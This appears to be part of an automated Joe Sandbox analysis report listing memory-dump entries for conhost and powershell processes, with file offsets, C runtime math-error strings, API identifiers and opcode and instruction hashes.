                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4064033741
                                    • Opcode ID: 77aa75729e29dbf5988ac53980e07ce2c190d3a73c1b784c16f68876b8834cbd
                                    • Instruction ID: e00f61d41401e46f9999b6d6bd366fdfa277fa283e431581338470fda6401616
                                    • Opcode Fuzzy Hash: 77aa75729e29dbf5988ac53980e07ce2c190d3a73c1b784c16f68876b8834cbd
                                    • Instruction Fuzzy Hash: C3F04F12C49F8485E2128F2CA4001EEB374FF5E789F185326EA8A76565DF29D6968710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4273532761
                                    • Opcode ID: 3ac046cabeb6d0b7aae3b37dd71682755883ba5e904a3956b9c1187371a52c10
                                    • Instruction ID: c56b209456fea95bfb8789f3040a5be4a71c7f9fc52fccef0d62aa42a704bb1d
                                    • Opcode Fuzzy Hash: 3ac046cabeb6d0b7aae3b37dd71682755883ba5e904a3956b9c1187371a52c10
                                    • Instruction Fuzzy Hash: 25F0AF12C08F4481E2128F1CA4000EEB374FF4E789F185326EA8936560DF29E6928710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2187435201
                                    • Opcode ID: 93b4d4083b18e9672bf8a119e9ca8b5d97876ef0a22b5476574a553aca9889b1
                                    • Instruction ID: b11ec48644d7accdde0da8302f5cb8acdeeebd27958e2d4fd169ffc2856fab37
                                    • Opcode Fuzzy Hash: 93b4d4083b18e9672bf8a119e9ca8b5d97876ef0a22b5476574a553aca9889b1
                                    • Instruction Fuzzy Hash: 71F04F12C48F4485D2128F1CA4001EEB374FF5E789F185326EA8A76565DF29E6928710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2468659920
                                    • Opcode ID: 627e953686afcf6d0ac62faafb3dbc2ae17aaa1664abc7917e467f67aa4fbba8
                                    • Instruction ID: cf13032816971433b4574a3b9902fe562a8b0510b1edc218ed77db6240006ae0
                                    • Opcode Fuzzy Hash: 627e953686afcf6d0ac62faafb3dbc2ae17aaa1664abc7917e467f67aa4fbba8
                                    • Instruction Fuzzy Hash: E2F04F52C48F4885D212CF1CA4001EEB374FF9E789F185326EA8976565DF29E6928710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4283191376
                                    • Opcode ID: 7f92d130cce21c2f31621881bde1b9e11798fe127ce7f7332aab9cfc7e7cfde4
                                    • Instruction ID: a40b9f1df956b76b5091d7fc4e7449522c487e4e76b2bc34a2be9f994e3cada1
                                    • Opcode Fuzzy Hash: 7f92d130cce21c2f31621881bde1b9e11798fe127ce7f7332aab9cfc7e7cfde4
                                    • Instruction Fuzzy Hash: D2F04F12C49F4885E2128F1CA4001EEB374FF5E789F185326EA8A76565DF29D6968710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2713391170
                                    • Opcode ID: 31b6d2850555b7388cd954b168e21c3fb6e4ba2054255dc94b2c067aad6ee3bf
                                    • Instruction ID: 65248231e84344215af70efbe6441d5234dbe82da036558c4e28f5cbcd1e4da8
                                    • Opcode Fuzzy Hash: 31b6d2850555b7388cd954b168e21c3fb6e4ba2054255dc94b2c067aad6ee3bf
                                    • Instruction Fuzzy Hash: 5CF06216C44F4485D202CF1CA8001AAB374FF5E789F145326EF8D36525DF29D5938700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeavefree
                                    • String ID:
                                    • API String ID: 4020351045-0
                                    • Opcode ID: 7f3b1ea40ebe754951ef5490da30fd20d8c41ff35c31e8fed40a0bb8d3b06e42
                                    • Instruction ID: 63a692726ccc854b2ac5ce5ec82e3e6b88ffe3e1f8a4691b2d5a1f886547eaf9
                                    • Opcode Fuzzy Hash: 7f3b1ea40ebe754951ef5490da30fd20d8c41ff35c31e8fed40a0bb8d3b06e42
                                    • Instruction Fuzzy Hash: 8E111B61F0960382EB548B55E89057D63A1AFA8B40F554536CA0EC73A0EF7EE97683A0
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2844444707.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9baa0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7fb5dd23716628e1efe50c08cd67fed29d83606ad418f7441e6f6b35f5063cc
                                    • Instruction ID: 4ba324535c78ab684d531db93b8ff885bf99c0f0a54a8ee48cb9bddfc1edfc1c
                                    • Opcode Fuzzy Hash: a7fb5dd23716628e1efe50c08cd67fed29d83606ad418f7441e6f6b35f5063cc
                                    • Instruction Fuzzy Hash: 2431063191CB8C4FDB58DB5CDC4A6A9BBE0FB69720F00426FE449D3252DA74A855CBC2
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2841583176.00007FFD9B98D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B98D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9b98d000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59507ddca0d2e3a091a4623dbb3a81749009cb0e704e4fc1d4a2592f03f2cc19
                                    • Instruction ID: 1e47ea6a0f19c21eb7de6d7892dee51b6d3464005ef9b86d8ecda6d3ae8e0c45
                                    • Opcode Fuzzy Hash: 59507ddca0d2e3a091a4623dbb3a81749009cb0e704e4fc1d4a2592f03f2cc19
                                    • Instruction Fuzzy Hash: 6041287140EFC45FE7569B289C619523FF0EF53320B1A05DFD488CB1A3D625A84AC7A2
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2844444707.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9baa0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c89c041dfbbef7d1b3114a2a63b609b0fda712459d0b48deed929be786a3570
                                    • Instruction ID: 047311248dd2b8278359f29a2bd8df5f86832d15382856fc0bde33dea5d2d209
                                    • Opcode Fuzzy Hash: 0c89c041dfbbef7d1b3114a2a63b609b0fda712459d0b48deed929be786a3570
                                    • Instruction Fuzzy Hash: B321073090C64C4FDB58DF9CC84A7E97BF0EB56321F04426BD449C7152DA74A406CBA1
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2844444707.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9baa0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b08376457c08db8008bfa77483a90a4a0360541801058dce5cd043a4e6c56b69
                                    • Instruction ID: 2e91e71cc2b44e39cb8f7cd722c398ee3008c0f16b60a0073bc18851048dd9ec
                                    • Opcode Fuzzy Hash: b08376457c08db8008bfa77483a90a4a0360541801058dce5cd043a4e6c56b69
                                    • Instruction Fuzzy Hash: 8D01847120CB0C8FD748EF0CE051AA5B3E0FB85360F10056EE58AC36A1DA32E881CB45
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2844444707.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9baa0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9640db8af87f467f2c1612031fb2170497b91fd7fe6d921295cd425484d0c8bd
                                    • Instruction ID: 94d39a2108ff2cbeac65aa26d9cf6e8a82deec17dc557388c334c7a133e9a4ac
                                    • Opcode Fuzzy Hash: 9640db8af87f467f2c1612031fb2170497b91fd7fe6d921295cd425484d0c8bd
                                    • Instruction Fuzzy Hash: 75F02431808A8D8FDB16DF68C8255E57FE0FF26210F05029BE458C70B2DB74A558CB92
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2849101649.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9bb70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86c32585758c653ba3008500399e4de75549168890b47fa5cc486c09abc26883
                                    • Instruction ID: d512122a0cc571cda6505bf6f2df41085094db47f576ab9a8a8b008a34665ecf
                                    • Opcode Fuzzy Hash: 86c32585758c653ba3008500399e4de75549168890b47fa5cc486c09abc26883
                                    • Instruction Fuzzy Hash: 3EF0BE32B0E5498FD768EA5CE4918A873E0FF4532571100BAE16DC74B3CA25EC40CB44
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2849101649.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9bb70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f6a38a6916925bff6cb7863a0f9bde07417e516a9836fcf9d755e273bc6f1cb
                                    • Instruction ID: 3c4de7d38249404b629416152503ae0e93e630e0aa6acb4dc1d87811b847f389
                                    • Opcode Fuzzy Hash: 6f6a38a6916925bff6cb7863a0f9bde07417e516a9836fcf9d755e273bc6f1cb
                                    • Instruction Fuzzy Hash: ACF05E32A0E5498FE768EA5CE4958A877E0FF4532571500BAE15DC74B3DA26EC50CB40
                                    Memory Dump Source
                                    • Source File: 0000003A.00000002.2849101649.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_58_2_7ffd9bb70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee915be0f811ce1343a570ed966bca37c2a78d742b9e6b523e2fdcc0210d4887
                                    • Instruction ID: c4d29b3d09e880b390991a2ac33d34be86d77132451868ac55264eba1b037e43
                                    • Opcode Fuzzy Hash: ee915be0f811ce1343a570ed966bca37c2a78d742b9e6b523e2fdcc0210d4887
                                    • Instruction Fuzzy Hash: 8EF0A03171CF044FE748EE2DE449AA2B3E0FBA8314F10462FE44AC3291DA21E8818782